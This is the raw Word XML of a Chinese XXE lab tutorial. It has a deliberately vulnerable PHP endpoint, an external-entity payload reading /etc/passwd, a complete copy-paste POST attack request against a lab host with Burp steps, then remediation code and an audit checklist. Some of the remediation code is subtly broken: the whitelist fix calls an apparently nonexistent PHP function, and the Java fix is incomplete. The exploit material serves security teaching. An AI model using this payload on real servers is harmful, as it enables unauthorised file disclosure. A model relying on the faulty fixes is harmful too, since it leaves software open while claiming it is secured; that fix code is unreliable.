      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5.2 创建XML测试文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18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430CF47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AC3737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bash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mkdir test_xxe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chmod 777 test_xxe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cd test_xxe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vim book.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1934AF3D">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="heading_19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5.3 book.xml 逐行注释源码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19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850913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492129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xml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&lt;?xml version = "1.0" encoding = "UTF-8"?&gt;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XML声明：版本1.0，编码UTF-8，必须置于文档首行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&lt;!DOCTYPE book[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内部DTD定义，声明文档根元素为book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book (title, author, year, price)&gt;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约束根元素包含四个子标签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title (#PCDATA)&gt;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限定标签内容为纯文本，不可嵌套标签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author (#PCDATA)&gt;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year (#PCDATA)&gt;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price (#PCDATA)&gt;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&lt;!ENTITY author "张三"&gt;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定义内部实体，调用&amp;author;可自动替换为文本内容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]&gt;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&lt;book&gt;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&lt;title&gt;XML DTD实例&lt;/title&gt;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&lt;author&gt;&amp;author;&lt;/author&gt;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引用内部实体，触发解析替换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&lt;year&gt;2024&lt;/year&gt;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&lt;price&gt;29.99&lt;/price&gt;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&lt;/book&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02F2E4FB">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="heading_20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5.4 访问测试验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="48F873A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浏览器GET访问静态XML地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>http://192.168.44.128/test_xxe/book.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F94198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实验现象：实体 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&amp;author;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被解析为「张三」，证明靶机XML解析器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>默认开启实体解析功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，存在XXE漏洞前置风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD830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补充说明：该静态文件仅支持GET访问，无接口接收逻辑，因此无法用于XXE攻击，仅用于验证解析器特性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A018A90">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="heading_21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>六、任务8.2 XXE漏洞利用（GET/POST对比+完整Burp实操+核心Payload）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="366B47E3">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="heading_22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>6.1 漏洞源码安全审计（逐行注释）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22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D704F7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0F2AA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&lt;?php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高危配置：不禁用XML外部实体加载，开启XXE攻击入口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libxml_disable_entity_loader(false);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仅读取POST请求体原始数据，GET请求无法传入XML参数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$xmlfile = file_get_contents('php://input');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实例化XML文档解析器对象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$dom = new DOMDocument();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高危操作：开启外部实体解析、加载外部DTD文件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$dom-&gt;loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);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转换为SimpleXML对象，方便读取节点数据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$creds = simplexml_import_dom($dom);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直接获取用户可控XML节点数据，无过滤、无转义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$username = $creds-&gt;username;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$password = $creds-&gt;password;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直接输出解析后数据，恶意外部实体逻辑被执行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echo 'hello' . $username;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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7461A3F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审计结论：代码仅接收POST请求体数据，完全满足XXE四大触发条件，属于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>高危可直接利用漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，GET请求无法触发攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496C24AD">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="heading_23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>6.2 Burp Suite前置准备（零基础详细步骤）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="5D4FFEF6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启动Burp Suite，选择临时项目、默认配置，进入主界面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA3D0F4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进入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Proxy-Intercept</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 模块，开启拦截（Intercept is on）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118325FB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配置浏览器代理：手动代理 127.0.0.1:8080，适配所有协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F5EA2">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="heading_24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>6.3 核心实验：XXE读取服务器/etc/passwd文件（标准Payload）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="5827D7E6">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="heading_25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.3.1 攻击Payload（逐行注释，最终保留版本）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25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2CF470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907249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xml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&lt;?xml version="1.0"?&gt;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XML标准版本声明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&lt;!DOCTYPE creds[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自定义DTD约束，定义文档根元素为creds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username ANY&gt;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允许username标签接收任意解析内容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password ANY&gt;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password标签占位，无实际作用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&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;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定义恶意外部实体，通过file协议读取服务器系统用户文件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]&gt;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&lt;creds&gt;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&lt;username&gt;&amp;xxe;&lt;/username&gt;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&lt;!-- 引用恶意外部实体，触发文件读取与内容回显 --&gt;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&lt;password&gt;test&lt;/password&gt;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&lt;/creds&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44575935">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="heading_26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.3.2 Burp完整分步实操（GET改POST核心操作）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="3C9F06E2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保持Burp拦截开启，浏览器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GET访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>漏洞地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>http://192.168.44.128/xxe/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D4DF8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请求被Burp成功拦截，此时原始请求为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GET空请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，无请求体、无法攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53423C5C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修改请求方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：将请求首行的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 手动改为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CAD90D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添加专属请求头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：在所有Header最后一行、空行上方添加：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Content-Type: application/xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，标识本次请求为XML接口数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41C7C6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清空原有内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：删除默认GET请求的空白请求体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E53D1F5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粘贴恶意Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：将完整XML攻击代码粘贴至请求体，保证请求头与请求体之间存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>唯一空行分隔</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270CAF44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点击 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Forward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 放行请求，服务端接收POST XML数据并解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A753F21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浏览器响应页面输出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hello</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 服务器 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 完整用户数据，漏洞利用成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE8EF9C">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="heading_27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.3.3 完整可直接复制的POST攻击请求包</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27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8A4AD0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4E20DD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plain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POST /xxe/index.php HTTP/1.1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Host: 192.168.44.128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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8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Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5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Accept-Encoding: gzip, deflate, br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Connection: keep-alive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Upgrade-Insecure-Requests: 1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Priority: u=0, i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Content-Type: application/xml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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE creds[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username ANY&gt;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password ANY&gt;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&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;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]&gt;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&lt;creds&gt;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&lt;username&gt;&amp;xxe;&lt;/username&gt;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&lt;password&gt;test&lt;/password&gt;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&lt;/creds&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="164BDECB">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="heading_28"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.3.4 GET请求无法攻击的验证实验</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="67FFAC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直接使用浏览器GET访问漏洞接口、或Burp保持GET方法携带参数，均无法触发漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B247387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原因1：GET无请求体，无法存放大段XML DTD与实体代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEE3235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原因2：漏洞源码仅读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>php://input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（POST请求体），不读取URL参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0DC2BD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现象：GET请求仅返回空白页面或默认内容，无文件读取、无漏洞触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36481633">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="heading_29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>七、任务8.3 修复XXE漏洞（逐行代码注释+安全加固）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="735E7EC4">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="heading_30"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>7.1 修复方案1：PHP禁用外部实体（最常用、最根本）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30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00148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D04F4C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&lt;?php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根源防御：强制关闭所有XML外部实体加载，彻底封堵XXE攻击入口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libxml_disable_entity_loader(true);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安全解析用户输入XML，不再解析恶意外部实体与远程资源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$xml = simplexml_load_string($input);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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D9006E7">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="heading_31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>7.2 修复方案2：自定义安全实体加载器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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29BEE92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2457BD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&lt;?php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模拟含恶意外部DTD引用的XML数据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$xml=&lt;&lt;&lt;XML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&lt;!DOCTYPE foo PUBLIC "-//FOO/BAR" "http://example.com/fobar"&gt;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&lt;foo&gt;bar&lt;/foo&gt;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XML;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定义本地安全DTD，替代远程恶意DTD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$dtd=&lt;&lt;&lt;DTD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&lt;!ELEMENT foo (#PCDATA)&gt;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DTD;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注册自定义外部实体加载回调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libxml_set_external_entity_loader( function ($public, $system, $context) use($dtd) {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审计日志打印恶意请求信息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var_dump($public);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var_dump($system);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var_dump($context);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开辟内存临时流，加载安全DTD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$f = fopen("php://temp","r+");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fwrite($f, $dtd);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rewind($f);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// 返回安全内容，禁止访问恶意外部地址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 xml:space="preserve">    return $f;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});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$dd = new DOMDocument;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$r = $dd-&gt;loadXML($xml);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var_dump($dd-&gt;validate());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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73C53685">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="heading_32"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>7.3 修复方案3：白名单机制</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32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88E5D3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8EB11D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php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&lt;?php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配置可信合法DTD地址白名单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$whitelist = array(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'http://www.example.com/entity1.dtd',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'http://www.example.com/entity2.dtd',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仅允许白名单内外部实体加载，拦截所有恶意外部资源请求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libxml_set_valid_entity_loader($whitelist);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$xml = simplexml_load_string($input);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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F89C891">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="heading_33"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>7.4 修复方案4：版本升级（天然防御）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="4D58796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PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7.2.0及以上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 版本默认禁用XML外部实体加载，无需修改代码，天然防御XXE漏洞，是极简且安全的加固方案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E432AE2">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="heading_34"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>7.5 Java项目XXE标准修复代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34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57117D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9E1494">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>java</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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创建XML解析工厂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DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();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// 关闭外部实体引用展开，从底层彻底防御XXE漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>dbf.setExpandEntityReferences(false);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BB6BE5D">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="heading_35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>八、安全审计检查清单（含接口请求规范）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="734E2798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审计业务POST接口是否接收用户可控XML数据、是否配置 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>application/xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求头</w:t>
      </w:r>
    </w:p>
